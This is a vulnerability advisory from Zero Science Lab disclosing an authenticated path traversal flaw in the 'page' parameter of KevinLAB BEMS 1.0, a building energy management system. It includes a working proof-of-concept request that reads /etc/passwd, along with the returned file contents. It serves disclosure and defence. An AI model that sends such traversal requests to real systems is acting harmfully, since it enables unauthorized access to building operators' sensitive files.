KevinLAB BEMS 1.0 Authenticated File Path Traversal / Information Disclosure

`  
KevinLAB BEMS 1.0 Authenticated File Path Traversal Information Disclosure  
  
  
Vendor: KevinLAB Inc.  
Product web page: http://www.kevinlab.com  
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)  
  
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy  
management platform. KevinLAB's BEMS (Building Energy Management System) enables  
efficient energy management in buildings. It improves the efficient of energy use  
by collecting and analyzing various information of energy usage and facilities in  
the building. It also manages energy usage, facility efficiency and indoor environment  
control.  
  
Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability.  
Input passed through the 'page' GET parameter in index.php is not properly verified  
before being used to include files. This can be exploited to disclose the contents  
of arbitrary and sensitive files via directory traversal attacks.  
  
Tested on: Linux CentOS 7  
Apache 2.4.6  
Python 2.7.5  
PHP 5.4.16  
MariaDB 5.5.68  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5656  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php  
  
  
05.07.2021  
  
--  
  
  
GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
...  
...  
`